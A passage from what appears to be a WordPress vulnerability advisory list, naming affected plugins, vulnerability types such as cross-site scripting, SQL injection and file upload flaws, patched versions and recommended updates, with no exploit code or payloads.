Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Remote Code Execution
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Swim Team

Vulnerability: Directory Traversal
Patched Version: 1.45.1085
Recommended Action: Update to version 1.45.1085, or a newer patched version

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: SQL Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery via create_profile
Patched Version: 1.0.7.1
Recommended Action: Update to version 1.0.7.1, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Cross-Site Request Forgery via wp_ajax_wpcrm_log_verbosity
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: URL Params

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP Tabs Slides

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Improper Server-Side Checks to Booking Payment Bypass
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.23
Recommended Action: Update to version 1.1.23, or a newer patched version

Plugin: Meks Easy Social Share

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Modal Dialog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.15
Recommended Action: Update to version 3.5.15, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘className’ Block Option
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Vitamin

Vulnerability: Directory Traversal
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Cross-Site Request Forgery to Account Creation
Patched Version: 26.6
Recommended Action: Update to version 26.6, or a newer patched version

Plugin: Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free

Vulnerability: Missing Authorization to Category Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Reflected Cross-Site Scripting via REQUEST_URI
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: WooODT Lite – Delivery & pickup date time location for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: ImageBoss – Images Up To 60% Smaller & CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Tracking Code Manager

Vulnerability: Denial of Service
Patched Version: 1.11.5
Recommended Action: Update to version 1.11.5, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Directory Traversal
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: Cross-Site Request Forgery via ‘clicked’
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: WooCommerce Etsy Integration

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Xorbin Digital Flash Clock

Vulnerability: DOM Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via ipf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: teachPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.0.5
Recommended Action: Update to version 9.0.5, or a newer patched version

Plugin: GTmetrix for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.4.8
Recommended Action: Update to version 0.4.8, or a newer patched version

Plugin: Booster Elite for WooCommerce

Vulnerability: Authenticated (Subscriber+) Content Injection
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Cashtomer

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Video Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2.3
Recommended Action: Update to version 1.2.2.3, or a newer patched version

Plugin: Brands for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.2.3
Recommended Action: Update to version 3.8.2.3, or a newer patched version

Plugin: Related Sites

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Thumbnail carousel slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: WonderPlugin Audio Player

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Knowledge Base

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Broken Link Checker for YouTube

Vulnerability: Cross-Site Request Forgery via plugin_settings_page()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Manager for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Sign-up Sheets

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Read and Understood

Vulnerability: Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Uploader

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Manager Pro – Filester

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Reflected Cross-Site Scripting via Color Settings
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.69
Recommended Action: Update to version 1.5.69, or a newer patched version

Plugin: Site Editor

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Crazy Bone

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Core: WordPress

Vulnerability: Deserialization via Widgets
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Quick Paypal Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.7.26
Recommended Action: Update to version 5.7.26, or a newer patched version

Plugin: KONTXT Improves WordPress Search

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.30.0
Recommended Action: Update to version 1.30.0, or a newer patched version

Plugin: Local Delivery Drivers for WooCommerce

Vulnerability: Missing Authorization to Driver Account Takeover
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Contact Form 7 Redirect & Thank You Page

Vulnerability: Cross-Site Request Forgery via cf7rl_admin_table
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Denial of Service
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Symposium

Vulnerability: Arbitrary File Upload
Patched Version: 11.12.24
Recommended Action: Update to version 11.12.24, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Arbitrary File Upload in File Manager
Patched Version: 1.5.61
Recommended Action: Update to version 1.5.61, or a newer patched version

Plugin: Xtreme Locator

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Field Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: GetResponse for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.5.32
Recommended Action: Update to version 5.5.32, or a newer patched version

Plugin: WP Survey And Quiz Tool

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Database Reset

Vulnerability: Unauthenticated Database Reset
Patched Version: 3.15
Recommended Action: Update to version 3.15, or a newer patched version

Plugin: BSK PDF Manager

Vulnerability: Admin+ SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: NewStatPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: WordPress Spreadsheet

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Made Easy

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.2.24
Recommended Action: Update to version 2.2.24, or a newer patched version

Plugin: 博客社交分享组件

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary Code Execution
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘addRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.9
Recommended Action: Update to version 1.11.9, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting via tagcloud
Patched Version: 1.23
Recommended Action: Update to version 1.23, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.9.6
Recommended Action: Update to version 1.4.9.6, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.27.9
Recommended Action: Update to version 3.27.9, or a newer patched version

Plugin: Simple SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.92
Recommended Action: Update to version 1.7.92, or a newer patched version

Plugin: Inline Tweet Sharer – Twitter Sharing Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Edit Comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Vertical Icon Menu

Vulnerability: Reflected Cross-Site Scripting via ‘id’
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Pricing Table by Supsystic

Vulnerability: Boolean-Based Blind SQL Injections
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Missing Authorization in rx_coupon_from_submit
Patched Version: 1.6.18
Recommended Action: Update to version 1.6.18, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.62
Recommended Action: Update to version 4.62, or a newer patched version

Plugin: Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager

Vulnerability: Authenticated (Author+) Arbitrary File Upload in handle_folders_file_upload
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Contact Form Submissions

Vulnerability: Authenticated SQL Injection
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Lana Downloads Manager

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Missing Authentication leading to Sensitive Information Disclosure (Private Post Leakage)
Patched Version: 3.5.5.9
Recommended Action: Update to version 3.5.5.9, or a newer patched version

Plugin: Simple Posts Ticker – Easy, Lightweight & Flexible

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Login Logout Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Levo Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Usersnap

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.17
Recommended Action: Update to version 4.17, or a newer patched version

Plugin: Weblizar Pin Feeds

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: FeedList

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.70.00
Recommended Action: Update to version 2.70.00, or a newer patched version

Plugin: File Uploader

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Images Ape

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Firewall 2

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Testimonial – WordPress Testimonial Showcase Plugin Grid Plus Testimonial Slider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.16.0
Recommended Action: Update to version 2.16.0, or a newer patched version

Plugin: Multisite Post Duplicator

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Quiz Restoration
Patched Version: 8.1.0
Recommended Action: Update to version 8.1.0, or a newer patched version

Plugin: VK Block Patterns

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.31.2.0
Recommended Action: Update to version 1.31.2.0, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Open Redirect
Patched Version: 3.3.10
Recommended Action: Update to version 3.3.10, or a newer patched version

Plugin: Cartpauj Register Captcha

Vulnerability: CAPTCHA Bypass
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Image SEO – AI-Driven Image SEO Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.50
Recommended Action: Update to version 2.2.50, or a newer patched version

Plugin: Slideshow CK

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: Contentboxes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 6.9.1
Recommended Action: Update to version 6.9.1, or a newer patched version

Plugin: WP Blogs' Planetarium

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_sort_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Remote File Inclusion
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.2.4.6
Recommended Action: Update to version 5.2.4.6, or a newer patched version

Plugin: Business Hours Indicator

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Downloads Manager

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page scroll to id

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20
Recommended Action: Update to version 4.20, or a newer patched version

Plugin: flash-photo-gallery

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Enhanced Plugin Admin

Vulnerability: Cross-Site Request Forgery via epa_options_page
Patched Version: 1.17
Recommended Action: Update to version 1.17, or a newer patched version

Plugin: Woocommerce WordPress Auctions

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Slideshow SE

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Authenticated (Admin+) SQL Injection via orderby
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Smart Cookie Kit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Rating-Widget: Star Review System

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.9.0
Recommended Action: Update to version 2.9.0, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: 7.5.35.7212
Recommended Action: Update to version 7.5.35.7212, or a newer patched version

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 0.4.6
Recommended Action: Update to version 0.4.6, or a newer patched version

Plugin: Side Menu – add fixed side buttons

Vulnerability: SQL Injection
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Hero Maps Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Authenticated (Subscriber+) SQL Injection via id
Patched Version: 1.14.15
Recommended Action: Update to version 1.14.15, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: RokStories

Vulnerability: Abuse of Functionality
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Manage Upload Limit

Vulnerability: Reflected Cross-Site Scripting via upload_limit
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Privilege Escalation
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: ND Shortcodes

Vulnerability: Authenticated (Subscriber+) Local File Inclusion
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: duoFAQ – Responsive, Flat, Simple FAQ

Vulnerability: Responsive, Flat, Simple FAQ <= 1.4.8
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: SQL Injection
Patched Version: 3.7.40
Recommended Action: Update to version 3.7.40, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Open Redirect
Patched Version: 4.1.1.1
Recommended Action: Update to version 4.1.1.1, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: MailCWP

Vulnerability: Arbitrary File Upload
Patched Version: 1.110
Recommended Action: Update to version 1.110, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Authorization Bypass
Patched Version: 1.2.35.2
Recommended Action: Update to version 1.2.35.2, or a newer patched version

Plugin: Hotjar Connecticator

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Job Board

Vulnerability: Cross-Site Request Forgery via sjb_save_settings_section
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: WP Captcha

Vulnerability: CAPTCHA Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Meta pixel for WordPress

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting and Settings Deletion via wp_ajax_(save|delete)_fbe_settings
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP Subtitle

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Spryng Payments for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: No CAPTCHA reCAPTCHA for WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Plugin Settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: mTouch Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Easy Call Now by ThikShare

Vulnerability: Cross-Site Request Forgery via settings_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: No subtitle
Patched Version: 1.2.30
Recommended Action: Update to version 1.2.30, or a newer patched version

Plugin: WP e-Commerce

Vulnerability: Arbitrary File Upload
Patched Version: 3.6.8 RC1
Recommended Action: Update to version 3.6.8 RC1, or a newer patched version

Plugin: Markdown on Save Improved

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WooCommerce Checkout Field Manager

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 18.0
Recommended Action: Update to version 18.0, or a newer patched version

Plugin: BuddyPress

Vulnerability: Privilege Escalation
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Cross-Site Request Forgery to Privilege Escalation
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: WP Stripe Checkout

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2.21
Recommended Action: Update to version 1.2.2.21, or a newer patched version

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Cross-Site Scripting
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: DukaPress

Vulnerability: Directory Traversal
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: WP-ContactForm

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Links Manager Extension

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: SQL Injection
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: Simple File Downloader

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Reroute Email

